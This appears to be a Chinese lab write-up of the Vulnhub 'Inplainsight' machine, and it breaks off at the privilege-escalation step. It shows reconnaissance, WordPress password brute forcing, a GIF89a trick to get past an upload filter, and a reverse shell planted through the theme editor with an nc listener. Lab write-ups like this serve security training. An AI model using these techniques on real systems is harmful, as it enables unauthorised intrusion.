Vulnhub之Inplainsight靶机详细测试过程及经验教训

Inplainsight

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:f9:29:62      1      60  PCS Systemtechnik GmbH   

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
4. Nmap scan report for kb.final (192.168.56.254)
5. Host is up (0.00017s latency).
6. Not shown: 65532 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 21/tcp open  ftp     vsftpd 2.0.8 or later
9. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
10. |_-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
11. | ftp-syst:
12. |   STAT:
13. | FTP server status:
14. |      Connected to ::ffff:192.168.56.206
15. |      Logged in as ftp
16. |      TYPE: ASCII
17. |      No session bandwidth limit
18. |      Session timeout in seconds is 300
19. |      Control connection is plain text
20. |      Data connections will be plain text
21. |      At session startup, client count was 3
22. |      vsFTPd 3.0.3 - secure, fast, stable
23. |_End of status
24. 22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
25. | ssh-hostkey:
26. |   3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
27. |   256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
28. |_  256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
29. 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
30. |_http-title: Apache2 Ubuntu Default Page: It works
31. |_http-server-header: Apache/2.4.41 (Ubuntu)
32. MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
33. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
35. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36. Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：21（ftp)、22(ssh)、80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ ftp 192.168.56.254
3. Connected to 192.168.56.254.
4. 220 IPS Corp
5. Name (192.168.56.254:kali): anonymous
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls -alh
12. 229 Entering Extended Passive Mode (|||47934|)
13. 150 Here comes the directory listing.
14. drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 .
15. drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 ..
16. -rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
17. 226 Directory send OK.
18. ftp> get todo.txt
19. local: todo.txt remote: todo.txt
20. 229 Entering Extended Passive Mode (|||24332|)
21. 150 Opening BINARY mode data connection for todo.txt (306 bytes).
22. 100% |********************************************************************************|   306      410.47 KiB/s    00:00 ETA
23. 226 Transfer complete.
24. 306 bytes received in 00:00 (260.98 KiB/s)

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ cat todo.txt      
3. mike - please get ride of that worthless wordpress instance! it's a security ris
4. k.  if you have privilege issues, please ask joe for assitance.
6. joe - stop leaving backdoors on the system or your access will be removed! y
7. our rabiit holes aren't enough for these elite cyber hacking types.
9. - boss person

复制代码

• 用户：mike, joe
  
• 可能有backdoor文件
  
• 目标站点是wordpress?
  

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              php,js,html,txt,sh
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.php                 (Status: 403) [Size: 279]
19. /.html                (Status: 403) [Size: 279]
20. /index.html           (Status: 200) [Size: 10918]
21. /info.php             (Status: 200) [Size: 84027]
22. /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
23. /.php                 (Status: 403) [Size: 279]
24. /.html                (Status: 403) [Size: 279]
25. /server-status        (Status: 403) [Size: 279]
26. Progress: 1319837 / 1323366 (99.73%)===============================================================
27. 2023/04/15 20:59:29 Finished
28. ==========================================================

复制代码

Gobuster工具识别出目录/wordpress，访问该目录，发现页面显示不完整，查看页面源代码，可知需要添加主机名到/etc/hosts文件：inplainsight

1. ┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ sudo vim /etc/hosts                                       
3. [sudo] password for kali:
4.                                                                                                                               
5. ┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
6. └─$ cat /etc/hosts
7. 127.0.0.1       localhost
8. 127.0.1.1       kali
9. ::1             localhost ip6-localhost ip6-loopback
10. ff02::1         ip6-allnodes
11. ff02::2         ip6-allrouters
12. 192.168.56.254  inplainsight

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p                                       
3. ________________________________________________________
4. i] User(s) Identified:
6. [+] bossperson
7. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
8. | Confirmed By: Login Error Messages (Aggressive Detection)

复制代码

wpscan工具识别出用户名bossperson,看是否可以破解出密码

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt

复制代码

运行了15分钟，仍然没有破解出密码，暂时放弃这个方向。
接下来看能否扫描出有漏洞的插件？

1. (kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed

复制代码

没有识别出有漏洞的插件。
回到默认页面，注意到：

1. This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.
3. If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.

复制代码

存在一个文件/var/www/html/index.htnl
扩展名很奇怪，访问该页面
里面有个动画图片，点击一下，就跳转到另一个页面，可以上传文件
但是当上传shell.php时，返回错误：File is not an image.
用burpsuite拦截请求，看能否通过修改application-type来绕过
在Burpsuite修改应用类型为image/jpeg，未能成功
挡在shell.php头部增加一行：GIF89a
此时返回：File is an image - image/gif.此时页面源代码有注释：

1. [/code]对其进行解码：
2. [code]┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
3. └─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d                  
4. so-dev-wordpress     

复制代码

这应该是另外一个目录，这也就与todo文件中的描述对应起来，因此对该so-dev-wordpress进行扫描

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
3. [i] User(s) Identified:
5. [+] mike
6. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
7. | Confirmed By: Login Error Messages (Aggressive Detection)
9. [+] admin
10. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11. | Confirmed By: Login Error Messages (Aggressive Detection)
13.    

复制代码

1. (kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt

复制代码

运行了15分钟，没有破解出密码。

1. ──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed  

复制代码

wpscan工具也没有扫描出有漏洞的插件。
那看能不能破解出另外一个用户admin的密码，在感觉没啥希望的时候，运行了5分钟以后得到了密码：

1. ─(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
3. [!] Valid Combinations Found:
4. | Username: admin, Password: admin1

复制代码

用admin:admin1登录以后才发现mike是普通用户，而admin是管理员，很多情况下wpscan工具扫描出的一个用户是管理员，但是本靶机并非这种情况
将shell.php替换theme editor中的404模板，然后访问4o4.php文件得到shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
6. Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
7. 22:30:48 up  1:58,  0 users,  load average: 0.03, 1.09, 1.87
8. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
10. /bin/sh: 0: can't access tty; job control turned off
11. $ id
12. uid=33(www-data) gid=33(www-data) groups=33(www-data)
13. $ which python
14. $ which python3
15. /usr/bin/python3
16. $ python3 -c 'import pty;pty.spawn("/bin/bash")'
17. www-data@inplainsight:/$ cd /home
18. cd /home
19. www-data@inplainsight:/home$ ls -alh
20. ls -alh
21. total 16K
22. drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
23. drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
24. drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
25. drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
26. www-data@inplainsight:/home$ cd joe
27. cd joe
28. www-data@inplainsight:/home/joe$ ls -alh
29. ls -alh
30. total 32K
31. drwxr-xr-x 4 joe  joe  4.0K Nov 22  2019 .
32. drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
33. lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
34. -rw-r--r-- 1 joe  joe   220 May  5  2019 .bash_logout
35. -rw-r--r-- 1 joe  joe  3.7K May  5  2019 .bashrc
36. drwx------ 2 joe  joe  4.0K Nov 21  2019 .cache
37. drwx------ 3 joe  joe  4.0K Nov 21  2019 .gnupg
38. -rw-r--r-- 1 joe  joe   807 May  5  2019 .profile
39. -rw-rw---- 1 joe  joe    76 Nov 22  2019 journal
40. www-data@inplainsight:/home/joe$ cd ..
41. cd ..
42. www-data@inplainsight:/home$ ls -lah
43. ls -lah
44. total 16K
45. drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
46. drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
47. drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
48. drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
49. www-data@inplainsight:/home$ cd mike
50. cd mike
51. www-data@inplainsight:/home/mike$ ls -alh
52. ls -alh
53. total 28K
54. drwxr-xr-x 4 mike mike 4.0K Nov 22  2019 .
55. drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
56. lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
57. -rw-r--r-- 1 mike mike  220 Nov 21  2019 .bash_logout
58. -rw-r--r-- 1 mike mike 3.7K Nov 21  2019 .bashrc
59. drwx------ 2 mike mike 4.0K Nov 21  2019 .cache
60. drwx------ 3 mike mike 4.0K Nov 21  2019 .gnupg
61. -rw-r--r-- 1 mike mike  807 Nov 21  2019 .profile

复制代码

提权

[code]www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.phpcat wp-config.php